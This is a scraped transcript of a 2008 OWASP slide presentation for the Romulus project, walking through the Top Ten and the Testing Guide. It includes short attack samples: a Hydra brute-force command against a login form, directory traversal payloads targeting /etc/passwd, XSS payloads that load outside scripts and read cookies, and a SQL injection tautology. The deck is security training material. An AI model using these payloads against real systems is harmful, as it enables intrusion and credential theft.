romulus owasp
DESCRIPTION
Romulus project OWASP presentation. More info at: http://www.ict-romulus.eu/TRANSCRIPT
OWASPOVERVIEW
Alberto Pastor NietoInformática Gesfor
March 2008
OWASP
The Open Web Application Security ProjectOWASP Top TenOWASP Testing Guide (Tools demonstration)
OWASP
The Open Web Application Security ProjectOWASP Top TenOWASP Testing Guide (Tools demonstration)
OWASP
Open communityInterested in improving application securityNot affiliated with any technology company
OWASP
The Open Web Application Security ProjectOWASP Top TenOWASP Testing Guide (Tools demonstration)
1. Cross Site Scripting (XSS)2. Injection Flaws3. Malicious File Execution4. Insecure Direct Object Reference5. Cross Site Request Forgery (CSRF)6. Information Leakage and Improper Error Handling7. Broken Authentication and Session Management8. Insecure Cryptographic Storage9. Insecure Communications10. Failure to Restrict URL Access
OWASPTOP TEN (2007)
OWASP
The Open Web Application Security ProjectOWASP Top TenOWASP Testing Guide (Tools demonstration)
Information Gathering
Testing Web Application Fingerprint
Application Discovery
Spidering and Googling
SSL/TLS Testing
Testing for File Extensions Handling
Application Configuration Management Testing
Old, Backup and Unreferenced Files
Information GatheringTesting Web Application Fingerprint
Different servers
Different versions
Differentresponses
Information GatheringTesting Web Application Fingerprint
$ nc 202.41.76.251 80HEAD / HTTP/1.0
HTTP/1.1 200 OKDate: Mon, 16 Jun 2003 02:53:29 GMTServer: Apache/1.3.3 (Unix) (Red Hat/Linux)Last-Modified: Wed, 07 Oct 1998 11:18:14 GMTETag: "1813-49b-361b4df6"Accept-Ranges: bytesContent-Length: 1179Connection: closeContent-Type: text/html
Information GatheringTesting Web Application Fingerprint
NETCRAFT ( http://www.netcraft.com )httprint
( http://www.net-square.com/httprint/ )
Tools:
Information GatheringTesting Web Application Fingerprint
Information GatheringApplication Discovery
Related issues:
Different base URL Non-standard portsVirtual hosts
Information GatheringApplication Discovery
Different base URL:
Directory exploration?Google (site:www.example.com)Candidate URLs (Ex. Nessus)
Information GatheringApplication Discovery
Non-standard ports: nmap –P0 –sT –sV –p1-65535 192.168.1.100Interesting ports on 192.168.1.100:(The 65527 ports scanned but not shown below are in state: closed)PORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 3.5p1 (protocol 1.99)80/tcp open http Apache httpd 2.0.40 ((Red Hat Linux))443/tcp open ssl OpenSSL901/tcp open http Samba SWAT administration server
Information GatheringApplication Discovery
Virtual hosts: $ host -t ns www.owasp.orgwww.owasp.org is an alias for owasp.org.owasp.org name server ns1.secure.net.owasp.org name server ns2.secure.net.
http://searchdns.netcraft.com/?host
Information GatheringSpidering and Googling
Spidering:wget -r http://www.example.com
Googling:googlegath.plhttp://www.nothink.org/perl/googlegath/
Information GatheringSSL/TLS Testing
Vulnerability Scanners:
Expired certificatesWeak Ciphers...
Other tools: OpenSSL, SSLDigger
Information GatheringTesting for File Extensions Handling
Identify underlying technologiesTools:
wget curl web mirroring tools vulnerability scanners
Information GatheringApplication Configuration Management Testing
Typical files and y directorios conocidosBe careful with HTML commentsPersonalize Error PagesOnly load necessary modulesMinimised privilegesAccess (correct and incorrect) log
Information GatheringOld, Backup and Unreferenced Files
Site map and technology cluesContent cluesPractices:
look into robots.txt, sitemaps files public information (cache: site:) search files: ~ .old .bak...
Information GatheringOld, Backup and Unreferenced Files
No use: mod_autoindex y mod_info (Hide unnecessary information)Correctness permisionsUse CHROOTLogs recommendations
Business Logic Testing
Automated tools find it hard to understand contextPeople who know logic businessStrong data testing
Authentication
Dictionary attacksBruteforce attacksPattern searching attacks
Obtain User Accounts
AuthenticationObtain User Accounts
Tools:
John the RipperHydraBrutusRainbow Tables
AuthenticationObtain User Accounts
raven@blackbox /hydra $ ./hydra -L users.txt -P words.txt www.site.com https-post-form "/index.cgi:login&name=^USER^&password=^PASS^&login=Login:Not allowed" &
Hydra v5.3 (c) 2006 by van Hauser / THC - use allowed only for legal purposes.Hydra (http://www.thc.org)starting at 2009-07-04 19:16:17[DATA] 16 tasks, 1 servers, 1638 login tries (l:2/p:819), ~102 tries per task[DATA] attacking service http-post-form on port 443[STATUS] attack finished for wiki.intranet (waiting for childs to finish)[443] host: 10.0.0.1 login: owasp password: password[STATUS] attack finished for www.site.com (waiting for childs to finish)Hydra (http://www.thc.org) finished at 2009-07-04 19:18:34
AuthenticationBypassing authentication schema
• Direct page request• Parameter modification• Session IDs Prediction• SQL Injection
AuthenticationBypassing authentication schema
Tools:
WebScarabWebGoat (Trainning)
AuthenticationDirectory traversal/file include
Known as “dot-dot-slash”
2 evaluation steps:
Input vectors enumerationTesting Techniques
AuthenticationDirectory traversal/file include
Input vectors enumeration:
HTTP GET y POST requestsFile loadingHTML forms...
AuthenticationDirectory traversal/file include
Testing Techniques:
http://example.com/getUserProfile.jsp?item=../../../../etc/passwdCookie: USER=1826cc8f:PSTYLE=../../../../etc/passwdhttp://example.com/index.php?file=http://www.owasp.org/malicioustxt
CAREFUL WITH CHARSET!!%2e%2e%2f is ../%2e%2e/ is ../..%2f is ../
%2e%2e%5c is ..\%2e%2e\ is ..\..%5c is ..\
AuthenticationDirectory traversal/file include
Tools:
WebScarabParosBurp Suite
AuthenticationVulnerable remember password and pwd reset
"Security questions":
Multiple questionsStrong questionsNumber of attemptsCAPTCHASending to email
AuthenticationVulnerable remember password and pwd reset
Careful with “Remember password”:
<INPUT TYPE="password" AUTOCOMPLETE="off">
If password is into a Cookie:
In a hashed form
Session ManagementLogout and Browser Cache Management Testing
End Web Session:• The user logs out• The user remains idle for a certain amount of time and the application automatically logs him/her out
Session ManagementLogout and Browser Cache Management Testing
KEY:
INVALIDATE SERVER-SIDE SESSION
Java: HttpSession.invalidate()
Session ManagementLogout and Browser Cache Management Testing
Other practices:
End session button well visibleInvalidate Cookies in client-side
Session ManagementLogout and Browser Cache Management Testing
Tools:
WebScarabAdd N Edit Cookies (Firefox ext)Web Developer (Firefox ext)
Session ManagementAnalysis of the Session Management Schema
RandomlessUniquenessResistance to statistical analysisResistance to cryptographic analysis
Pasos a seguir:Pasos a seguir:
Session Tokens Analysis:
Session ManagementCookie and Session Token Manipulation
Cookie CollectionCookie Reverse EngineeringCookie manipulation
Steps:
Session ManagementCookie and Session Token Manipulation
WebScarabCookie Digger
Tools:
Session ManagementCross Site Request Forgery (CSRF)
Cross-Site Request Forgery (CSRF) describes a way to force an unknowing user to execute unwanted actions on a web application in which he is currently authenticated.
Recommended practices:Add session-related information in URLsUse POSTIntermediate pages (“Are you sure you really want to do this?”)Use REFERER headers
Data ValidationXSS (Cross Site Scripting)
XSS: Code injection attacks into the various interpreters in the browser.
http://server/cgi-bin/testcgi.exe?<SCRIPT>alert(“Cookie”+document.cookie)</SCRIPT>
<script src=http://www.example.com/malicious-code.js></script>%3cscript src=http://www.example.com/malicious-code.js%3e%3c/script%3e\x3cscript src=http://www.example.com/malicious-code.js\x3e\x3c/script\x3e
Revise all input vectors
Data ValidationXSS (Cross Site Scripting)
Tools:
OWASP CAL9000
Data ValidationSQL Injection
Insertion or "injection" of an SQL query via the input data from the client to the application.
Example:SELECT * FROM Users WHERE Username='$username' AND Password='$password'
Input:
$username = 1' or '1' = '1$password = 1' or '1' = '1
SELECT * FROM Users WHERE Username= '1' OR '1' = '1' AND Password= '1' OR '1' = '1'
Data ValidationSQL Injection
Tools:
OWASP SQLIXSQL DUMPER
Data ValidationOther Injections
LDAP Injection (Lightweight Directory Access Protocol)ORM Injection (Hibernate in Java, Nhibernate in .NET, ActiveRecord in Ruby on Rails)XML InjectionSSI InjectionXPATH InjectionIMAP/SMTP InjectionSystem commands Injection
Data ValidationBuffer overflow
Issues caused by buffer overflows:
Denial of service (DoS)Code InjectionCode execution
Practices:
Update softwareBest practices
Denial of Service
User accounts blocked (Use CAPTCHAs)Buffer overflowsUser specified object allocationUser input as a loop counterUser provide data to diskFailure to release resourcesStore too much data in Session
Web Services
XML Structural TestingOverloading the XML parser
XML Content-level TestingXML/SQL/XPath... Injections
Validate Input Size Naugthy SOAP Attachments TestingMan-in-the-middle Testing
AJAX Testing
Increased attack surface with many more inputs to secureExposed internal functions of the applicationClient access to third-party resources with no built-in security and encoding mechanismsFailure to protect authentication information and sessionsBlurred line between client-side and server-side code, resulting in security mistakes
Useful Tools
OWASP Enterprise Security APIOWASP Encoding (User Inputs validation)OWASP Stinger (HTTP request validation)OWASP CSRFTester Project
Any Question?
OWASPhttp://www.owasp.org
Romulus Project http://www.ict-romulus.org